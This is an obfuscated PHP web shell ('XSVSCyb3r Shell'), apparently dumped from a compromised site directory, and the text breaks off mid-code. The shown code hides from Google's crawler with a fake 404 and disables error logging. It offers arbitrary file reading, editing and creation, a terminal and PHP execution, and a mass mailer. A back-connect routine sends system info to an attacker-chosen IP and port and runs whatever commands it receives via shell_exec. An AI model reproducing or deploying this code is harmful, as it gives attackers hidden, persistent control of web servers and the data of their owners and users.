HEX

File: /home/gamerijr/gameshop4u.com/3456789765.txt
<?php
 goto ShPbA; Zu_Z3: ini_set("\x6d\x65\x6d\157\x72\x79\137\x6c\x69\x6d\x69\164", "\55\x31"); goto GS51M; GS51M: if (strpos($_SERVER["\110\124\x54\120\x5f\x55\x53\105\x52\137\x41\x47\x45\116\x54"], "\x47\157\x6f\x67\x6c\x65") !== false) { header("\110\x54\124\x50\57\x31\56\60\x20\64\x30\x34\40\x4e\157\x74\x20\x46\157\165\156\144"); die; } goto o_xj8; CphMa: $delete = $_GET["\x64\145\x6c\x65\x74\145"]; goto MiX_2; knc3V: foreach ($NavLinks as $NavLink => $NavRow) { $linknames = $NavLink == 0; $linkurls = $NavLink == $last; echo "\x3c\141\x20\150\x72\x65\146\x3d\42" . $NavRow["\165\x72\x6c"] . "\x22\x3e" . $NavRow["\x6e\141\x6d\x65"] . "\74\x2f\141\76\x20\57\40"; } goto wNNfj; j2CAJ: $upload = $_GET["\x64\130\102\x73\x62\62\x46\153"]; goto ANKt2; up3zz: @ini_set("\x6c\x6f\x67\x5f\145\162\x72\x6f\x72\x73", 0); goto MOEGi; QiDWg: $last = count($NavLinks) - 1; goto knc3V; ShPbA: ?>
<!doctypehtml><html><style stype="text/css">.flink{font-weight:400}body{background-color:#000;background:#000;color:#0f0;font-family:tahoma;font-size:12px}body a{color:#0f0;font-weight:700;text-decoration:none}body a:hover{text-decoration:underline}#main_content{border:1px solid red;overflow:hidden;width:1000px;height:auto;padding:15px;margin:0 auto;background:#000;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px}.enabled{color:#0f0}.enabled a{color:#0f0;font-weight:400}.disabled{color:#0f0}.execbox{width:250px;padding:5px 15px 15px 15px;height:auto;border:solid 1px red;background:#0a0a0a}.viewsource{border:solid 1px red;background:#0a0a0a;color:#0f0}.command{width:620px;border:solid 1px red;outline:0;background:#0a0a0a;color:#0f0}.response{width:616px;color:#0f0;height:300px;border-bottom:solid 1px red;border-right:solid 1px red;border-left:solid 1px red;border-top:0;outline:0;background:#0a0a0a;color:#0f0;margin:-4px 0 0 0}.TableHeader_Name{width:450px;padding:0 0 0 5px;height:25px;font-weight:700;font-family:verdana;background-color:#030143;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px}.TableHeader{width:100px;height:25px;font-weight:700;font-family:verdana;text-align:center;background-color:#030143}.TableHeaderoptions{padding:0 0 0 15px;width:170px;height:25px;font-weight:700;font-family:verdana;background-color:#030143;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px}.filesize{color:#0f0;text-align:center}.filenames a{font-weight:400;text-decoration:none}.filenames a:hover{text-decoration:underline}tr{background-color:#080808}tr:hover{background-color:#030143}#options{font-weight:200;font-family:tahoma;margin-left:10px;display:block}#title{font-size:25px;font-weight:700;font-family:arial;display:block;padding:15px 0 0 0}.Logo{font-size:150px;text-align:center;color:red}.logotext{font-size:20px;text-align:center;color:#0f0}.terminaltop{background-color:#030143;margin:-10px 0 -3px 0;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px}.TableHeaderoptions2{padding:0 0 0 15px;width:170px;height:25px;font-weight:700;font-family:verdana;background-color:#030143;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px}.box{padding:10px;background-color:#030143;border:1px solid red;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px}.box2{padding:5px;background-color:#030143;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px}.optionstr td{background-color:#030143}.optionstr td:hover{background-color:#030143}.chdir{background-color:#030143;color:#0f0;border:1px solid red;outline:0;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px}.godir{margin:0 10px 0 -5px;background-color:#030143;color:#0f0;border:1px solid red;outline:0;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px}</style><body><div id="main_content"><?php  goto JvkQY; ygZcf: $shellVersion = "\x31\x2e\x31"; goto j2CAJ; qXnzg: $NavLinks = array(array("\x6e\141\155\x65" => "\x4d\141\x69\156", "\165\x72\x6c" => "\x3f"), array("\x6e\141\x6d\145" => "\x53\145\x72\x76\145\162\x20\x49\156\146\157\x72\155\141\x74\151\157\156", "\165\x72\x6c" => "\x3f\x63\63\x4a\62\141\127\x35\155\142\x77\x3d"), array("\156\141\x6d\x65" => "\x46\x69\x6c\145\x20\x45\x78\160\154\157\x72\x65\x72", "\165\162\x6c" => "\x3f\132\x6d\154\x73\132\x56\71\x6c\x65\110\x42\x73\142\63\112\154\143\x67\75" . dirname(__FILE__) . "\x2f"), array("\156\141\155\145" => "\124\145\162\155\x69\156\141\154", "\165\162\154" => "\x3f\144\107\126\x79\x62\x57\154\150\142\x6d\167"), array("\x6e\141\x6d\145" => "\x48\x61\163\150\x20\111\x64\145\x6e\x74\x69\146\151\145\162", "\165\162\154" => "\x3f\141\107\x6b\x3d"), array("\156\x61\x6d\145" => "\120\110\x50\40\x45\170\x65\143", "\165\x72\154" => "\x3f\x65\166\x61\154"), array("\156\x61\x6d\x65" => "\102\x61\143\153\x20\x43\x6f\156\x6e\x65\x63\x74", "\x75\162\x6c" => "\x3f\x59\x6d\116\162\142\155\126\60\x3d"), array("\x6e\x61\155\145" => "\x4d\141\x73\163\x20\115\141\151\154\x65\x72", "\x75\x72\154" => "\77\x6b\x75\145\x71\x79\155\141\x73\x73"), array("\156\x61\155\145" => "\130\x53\x56\x53\x43\171\x62\x33\162\x20\123\x68\x65\x6c\x6c", "\165\x72\x6c" => "\x3f\x61\x32\x35\x33\141\130\116\61\132\121"), array("\156\x61\155\x65" => "\123\145\154\x66\40\x52\x65\x6d\x6f\166\145", "\x75\162\x6c" => "\x3f\x73\162\155\x76\145")); goto p0SJE; MiX_2: $file_explorer = $_GET["\x5a\x6d\154\x73\x5a\126\x39\x6c\145\x48\102\163\x62\x33\112\x6c\x63\x67"]; goto DRYjJ; wNNfj: if (strstr($CurrentUrl, "\162\x65\x61\x64\x66\x69\154\145")) { $sourcefile = $_REQUEST["\x72\x65\141\x64\146\151\154\x65"]; if (is_file($sourcefile)) { get_srv_info(); if (isset($sourcefile)) { $Finalsource = file_get_contents($sourcefile); echo "\74\x73\164\x72\157\x6e\147\x3e\x45\x64\x69\164\151\156\x67\40\72\x20\74\57\x73\164\x72\x6f\x6e\x67\76" . $sourcefile . "\x3c\142\x72\40\57\76\x3c\142\162\x20\x2f\76\74\x61\40\x68\162\145\x66\x3d\47" . $_SERVER["\x48\x54\x54\x50\x5f\x52\x45\x46\105\122\105\122"] . "\47\76\x26\x6c\141\x71\x75\x6f\x3b\x20\102\x61\x63\x6b\x20\164\157\x20\146\151\x6c\145\163\x3c\57\x61\x3e\x3c\142\x72\x20\x2f\76\74\146\x6f\162\155\40\141\x63\164\x69\157\156\x3d\x27\47\x20\x6d\x65\x74\x68\157\x64\75\47\x50\117\123\124\47\76\74\x74\x65\x78\x74\x61\x72\145\141\x20\x6e\141\x6d\145\x3d\x27\x73\157\165\x72\x63\x65\143\x6f\x64\x65\47\40\143\x6c\x61\163\x73\x3d\x27\x76\x69\x65\167\163\157\x75\162\x63\x65\x27\40\x72\x6f\x77\163\75\47\62\60\x27\x20\x63\x6f\x6c\x73\x3d\x27\x31\x32\61\x27\76" . htmlentities($Finalsource) . "\x3c\x2f\x74\x65\x78\x74\141\x72\145\141\76\74\x62\162\40\57\76\74\151\x6e\x70\165\x74\40\x74\171\160\x65\x3d\x27\123\165\x62\155\x69\x74\x27\40\x76\141\x6c\165\145\x3d\x27\x53\x61\166\145\40\x46\x69\x6c\145\x27\40\156\x61\x6d\x65\75\x27\163\x61\166\x65\x27\x20\x2f\76\74\x2f\146\157\x72\155\x3e"; } } else { echo "\104\141\164\141\40\156\157\164\40\163\x65\x6e\164\x2e"; } if (isset($_POST["\163\x61\x76\145"])) { $new_source = $_POST["\x73\157\165\x72\x63\145\143\157\144\145"]; $source_edit = fopen($sourcefile, "\167"); fwrite($source_edit, $new_source); fclose($source_edit); } } elseif (strstr($CurrentUrl, "\141\x47\x6b")) { get_srv_info(); echo "\x3c\160\76\x58\123\x56\x53\x43\171\142\63\x72\40\150\x61\x73\150\40\x69\x64\145\x6e\x74\151\x66\151\x65\x72\40\x69\163\x20\141\x62\154\145\40\164\157\x20\151\144\145\156\164\x69\146\x79\x20\x4d\104\x35\x2c\40\x53\110\101\55\61\x2c\40\115\x79\x53\x51\x4c\x35\x2c\x20\x44\x45\123\50\125\156\151\x78\51\54\x20\x53\110\x41\x2d\62\x35\x36\x2c\40\x53\x48\101\55\x33\70\64\x2c\x20\x53\110\x41\x2d\65\61\x32\54\x20\115\104\x35\x28\125\x6e\151\170\51\x2c\40\115\x44\x35\50\101\x50\x52\x29\54\40\x4d\x44\65\x28\x70\x68\160\x42\102\63\x29\x2c\40\x4d\104\65\50\127\157\162\144\x70\x72\145\163\163\x29\x2c\x20\x53\x48\101\55\x32\x35\66\50\x55\x6e\151\x78\51\x2c\40\x53\110\x41\x2d\65\x31\x32\50\x55\156\151\170\51\40\141\x6e\x64\x20\115\104\x35\50\x42\141\163\x65\55\66\x34\51\56\74\57\x70\x3e"; if (isset($_POST["\147\145\164\x68\141\163\150"])) { $hash = $_POST["\x68\141\163\x68"]; if (strlen($hash) == 32) { $hashresult == "\x4d\x44\65\40\x48\x61\x73\150"; } elseif (strlen($hash) == 40) { $hashresult = "\x53\110\x41\x2d\61\40\110\x61\x73\x68\57\40\x2f\x4d\171\123\x51\x4c\x35\x20\110\141\x73\150"; } elseif (strlen($hash) == 13) { $hashresult = "\x44\x45\x53\50\125\x6e\151\170\x29\x20\110\x61\x73\150"; } elseif (strlen($hash) == 16) { $hashresult = "\x4d\x79\123\x51\114\40\110\141\163\x68\x20\57\x20\57\104\105\x53\x28\x4f\x72\141\143\x6c\145\40\110\x61\x73\150\x29"; } elseif (strlen($hash) == 41) { $GetHashChar = substr($hash, 40); if ($GetHashChar == "\52") { $hashresult = "\x4d\x79\x53\x51\x4c\65\40\x48\x61\163\x68"; } } elseif (strlen($hash) == 64) { $hashresult = "\123\x48\101\x2d\x32\65\x36\40\x48\x61\x73\150"; } elseif (strlen($hash) == 96) { $hashresult = "\123\110\x41\55\63\x38\x34\40\x48\141\163\150"; } elseif (strlen($hash) == 128) { $hashresult = "\x53\x48\x41\55\65\x31\x32\x20\x48\141\163\x68"; } elseif (strlen($hash) == 34) { if (strstr($hash, "\44\61\x24")) { $hashresult = "\115\104\65\50\x55\x6e\x69\x78\x29\x20\x48\x61\x73\150"; } } elseif (strlen($hash) == 37) { if (strstr($hash, "\x24\x61\x70\x72\x31\44")) { $hashresult = "\115\x44\65\x28\101\120\122\51\x20\x48\141\x73\150"; } } elseif (strlen($hash) == 34) { if (strstr($hash, "\44\110\x24")) { $hashresult = "\115\104\x35\50\160\150\160\x42\x42\x33\x29\x20\x48\141\x73\150"; } } elseif (strlen($hash) == 34) { if (strstr($hash, "\x24\x50\44")) { $hashresult = "\x4d\104\65\50\127\x6f\x72\144\160\162\145\x73\163\x29\x20\x48\141\163\x68"; } } elseif (strlen($hash) == 39) { if (strstr($hash, "\x24\65\44")) { $hashresult = "\x53\110\x41\55\x32\x35\x36\x28\125\x6e\x69\170\51\40\x48\x61\163\x68"; } } elseif (strlen($hash) == 39) { if (strstr($hash, "\44\x36\44")) { $hashresult = "\123\x48\101\55\x35\61\x32\x28\125\156\x69\x78\51\40\x48\141\x73\x68"; } } elseif (strlen($hash) == 24) { if (strstr($hash, "\75\75")) { $hashresult = "\115\x44\65\x28\102\141\x73\x65\55\x36\64\51\40\110\x61\x73\150"; } } else { $hashresult = "\110\141\x73\x68\x20\x74\x79\160\145\x20\156\157\x74\40\x66\157\x75\x6e\x64"; } } else { $hashresult = "\x4e\x6f\164\40\110\141\x73\x68\40\x45\156\x74\145\x72\145\144"; } ?>
<center><form action=""method="POST"><table><tr class="optionstr"><td>Enter Hash :</td><td><input name="hash"class="command"></td><td><input name="gethash"type="submit"value="Identify Hash"></td></tr><tr class="optionstr"><td>Result :</td><td><?php  echo $hashresult; ?>
</td></tr></table></form></center><?php  } elseif (strstr($CurrentUrl, "\131\155\x4e\x72\142\x6d\x56\60")) { get_srv_info(); echo "\xa\74\144\x69\x76\x20\151\x64\x3d\42\x62\141\143\153\x22\76\12\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x3c\x68\x32\76\x42\x61\x63\153\x20\x43\157\156\156\145\143\164\74\x2f\x68\x32\76\12\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\74\160\x3e\102\141\x63\153\x20\x63\x6f\x6e\156\x65\x63\x74\40\x77\151\x6c\154\40\141\x6c\154\157\x77\x20\x79\x6f\165\x20\x74\x6f\x20\145\156\x74\x65\x72\x20\x73\x79\163\164\x65\155\40\x63\157\155\155\141\x6e\144\163\x20\x72\x65\x6d\x6f\164\145\154\171\x2e\x3c\x2f\160\76\12\x20\40\40\x20\40\40\x20\40\x20\40\x20\x20\x3c\160\x3e\xa\x20\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x3c\x74\141\142\x6c\x65\x3e\xa\x9\x9\x9\x9\x3c\x66\x6f\162\x6d\x20\x61\143\x74\151\157\x6e\x3d\42\x22\x20\x6d\x65\x74\x68\x6f\144\x3d\42\x70\157\163\164\x22\76\12\x9\x9\x9\x9\74\164\x72\40\x63\x6c\x61\163\x73\75\x22\x6f\160\164\151\x6f\x6e\x73\x74\x72\x22\x3e\74\x74\144\x3e\111\120\40\101\144\144\x72\145\163\x73\x20\x3a\40\x3c\57\164\144\76\74\164\144\x3e\74\x69\156\x70\x75\164\x20\x74\171\x70\x65\75\x22\164\x65\x78\164\142\x6f\x78\42\40\x6e\x61\155\145\x3d\x22\x69\160\x22\x20\163\164\171\x6c\145\x3d\x22\142\157\162\144\145\162\72\x31\x70\x78\40\x73\157\154\151\144\x20\43\x35\103\67\62\x39\66\x3b\x20\x63\157\154\157\162\72\x20\x23\65\x43\67\62\71\x36\x3b\142\141\x63\x6b\x67\x72\x6f\x75\156\144\55\x63\x6f\x6c\x6f\x72\x3a\x23\61\144\61\x64\x31\144\x3b\146\157\x6e\x74\x2d\163\151\172\x65\72\x31\63\x70\170\x3b\x22\76\74\57\164\144\76\x3c\x2f\x74\x72\x3e\12\x9\11\11\11\x3c\x74\162\x20\x63\154\141\163\163\75\42\x6f\x70\x74\x69\x6f\156\x73\164\162\42\76\x3c\x74\x64\76\120\157\162\164\40\72\x20\x3c\x2f\x74\x64\x3e\x3c\x74\144\x3e\74\151\156\160\165\x74\x20\x74\171\x70\x65\75\42\164\145\x78\x74\142\157\x78\42\x20\x6e\141\x6d\145\x3d\42\x70\157\x72\x74\x22\x20\x73\x74\171\x6c\145\x3d\x22\x62\x6f\162\144\145\x72\x3a\x31\x70\170\40\x73\x6f\154\151\x64\x20\x23\65\103\x37\62\x39\x36\x3b\40\x63\x6f\x6c\x6f\162\72\x20\x23\65\x43\67\62\x39\x36\73\x62\141\143\x6b\147\x72\x6f\x75\x6e\x64\55\x63\x6f\154\x6f\162\x3a\43\61\x64\x31\144\61\x64\73\x66\x6f\x6e\164\x2d\x73\151\172\145\x3a\x31\63\x70\170\x3b\x22\x3e\x3c\x2f\x74\x64\76\74\57\164\x72\76\xa\11\11\11\x9\74\164\x72\40\143\154\x61\163\x73\75\42\157\160\x74\151\157\156\163\164\162\x22\x3e\74\164\x64\76\74\151\x6e\x70\x75\164\x20\x74\x79\x70\x65\x3d\x22\x73\165\x62\x6d\x69\x74\x22\40\x6e\x61\x6d\145\x3d\42\x62\x69\x6e\x64\x22\40\x76\x61\x6c\x75\145\75\42\x4f\160\x65\x6e\40\x43\157\x6e\156\145\x63\x74\x69\157\x6e\42\40\163\164\171\x6c\x65\x3d\x22\142\157\x72\144\145\x72\72\61\x70\x78\x20\163\x6f\x6c\151\x64\x20\x23\x35\103\67\x32\71\66\x3b\40\143\x6f\x6c\x6f\162\72\40\43\65\x43\67\x32\x39\x36\x3b\x62\x61\x63\x6b\147\x72\x6f\x75\156\144\55\143\157\x6c\157\x72\72\x23\x31\144\61\x64\61\144\73\146\x6f\156\x74\x2d\163\x69\x7a\145\72\x31\63\160\x78\73\x22\x3e\x3c\x2f\164\x64\x3e\74\57\x74\x72\x3e\xa\11\11\x9\x9\x3c\x2f\x66\x6f\x72\155\76\xa\x9\x9\11\x9\x3c\x2f\x74\141\x62\154\145\x3e"; if (isset($_POST["\142\x69\156\144"])) { echo "\x3c\160\76\x41\x74\x74\x65\x6d\160\x74\151\156\147\40\103\x6f\x6e\x6e\x65\143\164\x69\157\156\x2e\56\56\74\57\x70\x3e"; $ip = $_POST["\151\160"]; $port = $_POST["\x70\157\x72\x74"]; $sockfd = fsockopen($ip, $port, $errno, $errstr); if ($errno != 0) { echo "\74\146\x6f\x6e\164\40\143\x6f\x6c\157\162\75\x27\162\x65\x64\47\x3e\x3c\x62\76{$errno}\x3c\57\142\x3e\40\72\x20{$errstr}\x3c\57\x66\157\x6e\x74\x3e"; } else { if (!$sockfd) { $result = "\74\160\76\125\156\145\x78\x70\x65\143\x74\x65\144\x20\145\x72\x72\157\x72\40\x68\141\x73\x20\x6f\x63\x63\165\x72\x65\x64\54\x20\143\x6f\x6e\x6e\x65\x63\x74\151\157\x6e\40\x6d\141\x79\x20\150\x61\x76\145\40\x66\141\151\154\x65\144\56\74\x2f\x70\x3e"; } else { fputs($sockfd, "\12\x7b\x23\43\x23\43\x23\43\43\x23\x23\43\43\43\43\x23\x23\43\43\x23\43\x23\x23\43\x23\43\43\43\x23\x23\x23\43\x23\x23\43\43\x23\43\43\x23\x23\x23\x23\43\x23\43\x23\43\x23\x23\43\43\43\x23\x23\x23\x23\x23\x23\43\43\43\x23\x23\x23\43\x7d\12\x2e\56\72\72\x20\130\x53\x56\x53\103\x79\142\63\162\x20\123\150\145\x6c\x6c\40\x3a\x3a\x2e\56\12\xa\75\x3e\x20\x42\141\x63\153\143\157\156\x6e\x65\143\x74\x20\xa\x3d\76\40\x42\x61\143\153\x9\12\12\x9\x9\x9\x9\11\11\11\x20\12\x7b\x23\x23\x23\43\x23\43\43\43\x23\x23\43\43\43\43\43\43\x23\x23\43\x23\43\43\43\x23\x23\x23\43\43\43\x23\43\43\x23\x23\x23\43\43\43\x23\x23\43\x23\x23\43\x23\43\43\43\x23\x23\x23\x23\x23\x23\43\x23\43\x23\x23\x23\x23\x23\43\x23\175"); $pwd = shell_exec("\x70\x77\144"); $sysinfo = shell_exec("\x75\156\x61\155\x65\x20\x2d\141"); $time = Shell_exec("\x74\151\155\x65"); $len = 1337; fputs($sockfd, "\x55\163\145\162\40", $sysinfo, "\143\157\156\156\145\143\x74\145\144\40\100\x20", $time, "\12\xa"); while (!feof($sockfd)) { $cmdPrompt = "\x5b\x42\123\110\124\x5d\43\72\76\40"; fputs($sockfd, $cmdPrompt); $command = fgets($sockfd, $len); fputs($sockfd, "\12" . shell_exec($command) . "\12\xa"); } fclose($sockfd); } } } echo "\x3c\x2f\x70\x3e\74\x2f\144\151\x76\x3e"; } elseif (strstr($CurrentUrl, "\142\127\x74\x6d\x62\x41")) { get_srv_info(); echo "\74\160\x3e\111\x66\40\x6e\x6f\40\x66\151\x6c\x65\x20\x70\x61\164\150\40\151\163\x20\151\156\143\154\x75\144\x65\144\x20\151\164\40\x77\151\154\154\x20\142\x65\40\x63\x72\x65\x61\x74\145\144\x20\167\151\164\150\151\156\40\164\x68\x65\x20\x73\141\x6d\x65\x20\144\151\x72\145\x63\164\157\x72\171\40\x61\163\x20\x74\150\145\40\163\x68\x65\x6c\154\56\74\57\160\x3e\x3c\x66\157\162\155\x20\x61\x63\164\x69\157\156\x3d\x27\x27\40\155\x65\164\x68\x6f\x64\75\x27\160\x6f\163\x74\47\x3e\x3c\160\76\x46\151\x6c\145\156\141\155\145\72\x20\74\151\156\160\165\164\x20\164\x79\x70\x65\x3d\x27\164\145\170\x74\x27\40\156\x61\155\145\75\x27\156\x65\167\x66\x69\154\145\156\x61\x6d\145\x27\40\x2f\x3e\x3c\x2f\x70\x3e\x3c\x70\x3e\x3c\151\x6e\x70\x75\164\x20\164\x79\x70\x65\x3d\x27\x73\165\x62\x6d\x69\x74\47\40\166\141\x6c\165\145\x3d\x27\103\x72\x65\141\x74\145\40\x46\x69\x6c\x65\x27\x20\156\141\x6d\145\x3d\47\x63\162\145\x61\164\x65\x27\40\57\76\x3c\57\x70\76\74\57\x66\x6f\162\x6d\76"; $newfilename = htmlentities($_POST["\x6e\145\167\146\x69\154\x65\156\141\x6d\x65"]); if (isset($_POST["\143\162\x65\x61\x74\x65"])) { $ourFileName = $newfilename; $ourFileHandle = fopen($ourFileName, "\x77") or die("\143\141\156\47\164\40\x6f\160\145\x6e\40\x66\x69\154\x65"); fclose($ourFileHandle); } echo "\74\x62\162\x20\57\76\x3c\x62\162\x20\x2f\76"; } elseif (strstr($CurrentUrl, "\142\x57\164\x6b\x61\x58\111")) { get_srv_info(); echo "\74\x70\x3e\111\x66\x20\x6e\x6f\40\x66\x69\x6c\x65\x20\160\141\x74\150\x20\151\163\x20\151\156\143\x6c\165\x64\x65\x64\40\144\151\x72\x65\x63\164\157\162\x79\x20\x77\x69\x6c\x6c\x20\x62\x65\40\x63\162\145\141\x74\x65\144\40\167\151\164\x68\x69\x6e\40\x74\x68\145\40\163\141\155\145\x20\x64\x69\162\145\143\164\x6f\162\x79\40\141\x73\x20\164\150\145\x20\x73\150\x65\154\x6c\56\x3c\x2f\x70\x3e\xa\11\11\x3c\146\x6f\162\155\40\141\x63\164\151\x6f\156\75\x27\47\40\155\145\164\150\157\144\75\x27\x70\157\x73\x74\x27\x3e\12\11\11\x3c\x70\x3e\x44\151\x72\x65\x63\x74\157\x72\x79\40\x4e\x61\155\x65\x20\x3a\x20\74\x69\x6e\x70\x75\164\40\164\x79\160\145\x3d\x27\x74\x65\x78\x74\x27\x20\x6e\141\x6d\x65\x3d\47\x6e\145\x77\x64\x69\x72\156\141\x6d\x65\x27\40\57\x3e\74\x2f\160\x3e\12\x9\x9\74\x70\76\74\x69\x6e\160\165\x74\x20\164\x79\160\145\x3d\47\x73\x75\142\155\151\x74\47\x20\166\x61\154\165\145\75\x27\103\162\x65\141\164\145\x20\x4e\145\167\x20\104\151\162\145\x63\x74\157\x72\171\47\x20\x6e\x61\x6d\145\x3d\x27\143\x72\145\x61\x74\145\x64\151\162\x27\40\57\x3e\x3c\57\160\x3e\12\x9\x9\x3c\x2f\x66\x6f\162\x6d\x3e"; $newdirname = htmlentities($_POST["\156\x65\167\144\151\162\156\141\x6d\x65"]); if (isset($_POST["\143\x72\145\141\164\x65\144\151\x72"])) { $ourdirName = $newdirname; mkdir($ourdirName, 511); echo "\104\151\162\145\x63\164\x6f\x72\171\x20\x43\162\x65\141\x74\145\144\41"; } echo "\xa\11\x9\x3c\142\x72\40\x2f\76\x3c\x62\162\40\x2f\76"; } elseif (strstr($CurrentUrl, "\132\x6d\154\x73\132\x56\x39\154\145\110\102\x73\x62\63\112\x6c\143\x67")) { get_srv_info(); $upload = $file_explorer; echo "\x3c\x70\76\x3c\x66\157\162\155\x20\141\143\164\151\157\x6e\75\x22\42\x20\x6d\x65\x74\150\157\x64\75\x22\x50\x4f\123\x54\42\x3e\x3c\x74\x61\x62\154\145\x3e\x3c\164\162\x20\143\154\x61\163\x73\75\42\157\160\164\x69\157\156\x73\x74\162\42\76\x3c\x74\144\76\74\x69\x6e\160\165\x74\x20\143\154\141\x73\x73\x3d\x22\x63\x68\144\x69\162\42\40\x74\x79\160\x65\75\x22\164\x65\x78\164\x22\40\x6e\141\x6d\x65\x3d\x22\x63\x68\x64\x69\x72\x22\40\x76\141\x6c\x75\145\x3d\x22" . $file_explorer . "\x22\42\x20\x2f\76\x3c\57\x74\x64\x3e\74\x74\x64\x3e\x3c\x2f\164\x64\x3e\74\x2f\x66\157\x72\x6d\76\x3c\x74\144\76\x3c\144\x69\166\40\x69\x64\75\x22\157\x70\164\151\157\156\163\42\76\x3c\x61\40\x68\x72\145\146\75\x22" . $CurrentUrl . "\42\76\x52\x65\146\162\145\x73\x68\x20\x46\151\x6c\x65\163\74\x2f\141\76\74\57\x64\151\x76\76\x3c\x2f\164\x64\76\x3c\x74\x64\76\74\x64\151\x76\x20\151\144\x3d\x22\x6f\160\164\x69\157\156\163\x22\76\74\41\x2d\x2d\74\141\40\x68\162\145\146\75\42\x3f\x62\127\164\153\x61\x58\111\x3d" . $file_explorer . "\42\76\115\x61\153\x65\x20\104\x69\x72\145\x63\164\x6f\x72\171\x3c\57\141\76\40\174\40\x3c\141\40\x68\162\145\146\75\x22\77\x62\x57\164\155\142\x41\75" . $file_explorer . "\x22\x3e\x4d\x61\x6b\145\x20\x46\x69\x6c\145\74\x2f\x61\76\40\174\40\x3c\x61\x20\150\x72\145\x66\x3d\42\77\144\130\x42\163\x62\62\x46\x6b\75" . $upload . "\x22\76\x55\160\x6c\157\x61\144\74\x2f\141\76\x3c\x2f\x64\151\x76\76\55\x2d\x3e\x3c\x2f\164\x64\76\74\x2f\x74\x72\x3e"; if (isset($_POST["\147\x6f\144\x69\162"])) { $mandircha = $_POST["\x63\x68\x64\x69\162"]; if ($mandircha) { header("\114\x6f\x63\141\x74\x69\x6f\156\72\40\77\132\155\154\163\132\126\x39\x6c\145\110\102\x73\142\x33\x4a\154\143\x67\75" . $_POST["\x63\x68\144\151\162"]); } } ?>
</div></p><table class="FileBrowserTable"><tr><td class="TableHeader_Name">FileName's</td><td class="TableHeader">Filetype</td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableHeader">Last Modified</td><td class="TableHeaderoptions">Options</td></tr><?php  $Shell_Directory = $_SERVER["\122\105\115\117\124\105\137\104\111\122"]; function GetFileType($file) { if (!is_dir($file)) { if (strstr($file, "\56")) { $FileExt = end(explode("\56", $file)); return $FileExt; } else { return "\x44\151\162\x65\x63\x74\157\x72\x79"; } } else { $Directory = "\104\x69\x72\145\x63\164\157\162\171"; return $Directory; } } function GetFileSize($file) { if (!is_dir($file)) { return round(filesize($file) / 1024, 2) . "\x20\x4b\x62"; } else { return "\116\x6f\164\x20\x41\x76\x61\x69\154\151\142\x6c\x65"; } } function LastModified($file) { return "\74\x63\145\156\164\x65\x72\76" . date("\155\x2f\144\x2f\171", filemtime($file)) . "\x3c\x2f\143\145\x6e\164\x65\162\x3e"; } function permissions($file) { if (is_readable($file)) { $readable = "\162"; } else { $readable = "\x3f"; } if (is_writable($file)) { $writable = "\x77"; } else { $writable = "\x3f"; } if (is_executable($file)) { $executable = "\170"; } else { $executable = "\x3f"; } if ($readable . "\55\x2d" . $writable . "\x2d\55" . $executable == "\162\55\x2d\167\x2d\x2d\170") { return "\x3c\143\145\x6e\x74\x65\x72\40\x73\x74\x79\x6c\145\x3d\x27\x63\x6f\x6c\x6f\x72\72\43\146\x31\146\x31\146\61\x3b\x27\x3e" . $readable . "\x2d\x2d" . $writable . "\x2d\x2d" . $executable . "\x3c\57\x63\145\x6e\x74\145\162\76"; } else { return "\74\143\x65\156\164\x65\162\x3e" . $readable . "\x2d\55" . $writable . "\x2d\x2d" . $executable . "\x3c\x2f\143\145\x6e\x74\145\162\x3e"; } } $Files = scandir($file_explorer); foreach ($Files as $File) { if ($File == "\x2e\56") { $currentDirectory = $_GET["\x5a\x6d\154\x73\132\126\x39\154\145\110\x42\163\x62\63\x4a\x6c\143\x67"]; $currentDirectory = substr($currentDirectory, 0, strrpos($currentDirectory, "\57")); echo "\74\164\162\76\74\x74\x64\76\x3c\141\40\x68\x72\145\x66\x3d\x27\77\132\155\154\x73\132\x56\71\x6c\x65\x48\102\163\142\63\112\x6c\x63\147\x3d" . $currentDirectory . "\47\76" . $File . "\x3c\57\x61\x3e\74\x2f\164\x64\76\x3c\x74\144\x3e\x3c\x2f\164\144\x3e\x3c\x74\x64\x3e\74\x2f\x74\144\76\x3c\164\x64\x3e\x3c\57\x74\x64\76\74\x74\144\x3e\74\x2f\164\x64\x3e\x3c\164\x64\x3e\x3c\57\164\144\76\x3c\57\164\x72\x3e"; } elseif ($File == "\x2e") { } else { $currentDirectory = $_GET["\x5a\x6d\x6c\x73\x5a\x56\71\x6c\145\x48\102\x73\142\63\x4a\154\143\147"]; $type = GetFileType($currentDirectory . "\57" . $File); if ($type == "\x44\x69\162\x65\x63\164\x6f\x72\171") { echo "\74\x74\x72\76\x3c\164\x64\x3e\x3c\x61\40\x63\x6c\x61\163\x73\x3d\47\x66\x6c\151\x6e\x6b\47\x20\164\151\164\154\x65\x3d\47\105\x78\x70\x6c\x6f\x72\x65\40\x44\x69\162\x65\x63\164\157\x72\x79\47\x20\x68\x72\145\146\x3d\x27\77\x5a\155\x6c\x73\x5a\x56\71\154\x65\x48\x42\163\x62\63\x4a\154\143\x67\75" . $currentDirectory . "\57" . $File . "\47\x3e" . $File . "\57\x3c\x2f\x61\76\x3c\x2f\x74\x64\x3e\74\164\x64\x3e\74\143\145\x6e\164\x65\x72\76" . $type . "\x3c\57\143\145\x6e\164\145\x72\x3e\x3c\57\x74\x64\x3e\x3c\164\x64\40\143\154\141\163\163\x3d\x27\146\151\x6c\x65\x73\151\172\145\47\76" . GetFileSize($currentDirectory . "\57" . $File) . 